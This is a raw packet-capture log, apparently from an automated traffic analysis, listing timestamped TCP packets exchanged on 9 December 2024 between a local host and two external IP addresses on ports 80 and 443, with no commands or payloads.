                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.184142113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.184196949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.184591055 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.184627056 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.185317993 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.185359955 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.185601950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.185651064 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.186317921 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.186367989 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.186552048 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.186594963 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.187455893 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.187709093 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.187720060 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.188822985 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.188872099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.189301014 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.189342022 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.189970970 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.190165997 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.190203905 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.190830946 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.190871954 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.191010952 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.191075087 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.191869020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.191931963 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.192142010 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.192197084 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.193061113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.193273067 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.193325996 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.194132090 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.194178104 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.194482088 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.194526911 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.195203066 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.195276022 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.195372105 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.195435047 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.196327925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.196384907 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.196620941 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.196664095 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.197458029 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.197670937 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.197710037 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.198590040 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.198627949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.198672056 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.198712111 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.199649096 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.200058937 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.200102091 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.200762987 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.200810909 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.200896025 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.200942993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.201881886 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.202313900 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.202358961 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.202955008 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.202999115 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.203098059 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.203136921 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.204097033 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.204137087 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.204402924 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.204441071 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.205190897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.205256939 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.205293894 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.206367016 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.206409931 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.206657887 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.206696987 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.207489967 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.207530022 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.207700014 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.207743883 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.208594084 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.208646059 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.208795071 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.208839893 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.209620953 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.209667921 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.209757090 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.209796906 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.210896015 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.211070061 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.211122990 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.211785078 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.211834908 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.212007046 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.212048054 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.212930918 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.212994099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.213248968 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.213298082 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.213979959 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.214122057 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.214168072 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.215163946 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.215205908 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.215495110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.215536118 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.216305971 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.216357946 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.216449022 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.216491938 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.217516899 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.218161106 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.218204021 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.218478918 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.218489885 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.218518972 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.218544960 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.219573975 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.219711065 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.219762087 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.220824003 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.220873117 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.221055984 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.221096039 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.221875906 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.221924067 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.222227097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.222270966 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.222919941 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.223268986 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.223320007 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.223953962 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.224003077 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.350496054 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.350547075 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.350579977 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.350613117 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.350615025 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.350630045 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.350655079 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.356587887 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.356625080 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.356633902 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.356643915 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.357918978 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.357925892 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.358407974 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.358485937 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.358535051 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.358903885 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.358913898 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.358939886 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.358968019 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.359739065 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.360424042 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.360464096 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.360937119 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.361082077 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.361124992 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.362061977 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.362103939 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.362246990 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.362287045 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.363090038 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.363128901 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.363405943 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.363445997 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.364162922 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.364202976 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.364363909 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.364403963 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.365298986 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.365310907 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.365341902 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.366395950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.366440058 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.366614103 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.366656065 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.367554903 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.367631912 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.367672920 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.368632078 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.368680954 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.368989944 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.369038105 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.369771004 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.369826078 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.370007992 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.370863914 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.370904922 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.371114969 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.371157885 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.371917963 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.371962070 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.372097969 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.372137070 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.373023033 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.373155117 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.373220921 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.373239040 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.373286963 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.373295069 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.374145031 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.374346018 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.374382973 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.375355005 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.375399113 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.375494957 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.375535965 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.376332998 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.376373053 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.376538992 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.376580000 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.377495050 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.377537966 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.377763987 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.377805948 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.378684044 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.378725052 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.379143953 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.379784107 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.379821062 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.380223036 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.380265951 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.380909920 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.380975962 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.381099939 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.381143093 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.381967068 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.382088900 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.382138014 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.383032084 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.383044958 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.383074045 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.383105993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.384207010 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.384622097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.384671926 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.385303020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.385313988 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.385350943 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.386470079 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.386512041 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.386890888 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.386933088 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.387547970 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.387559891 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.387593985 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.387607098 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.388528109 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.388804913 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.388849974 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.389688969 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.389736891 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.389914036 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.389955044 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.390748024 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.390793085 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.390974045 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.391876936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.391918898 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.392007113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.392043114 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.393105984 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.393151999 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.394089937 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.394102097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.394113064 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.394140005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.394169092 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:36.395292044 CET8049923185.215.113.16192.168.2.6
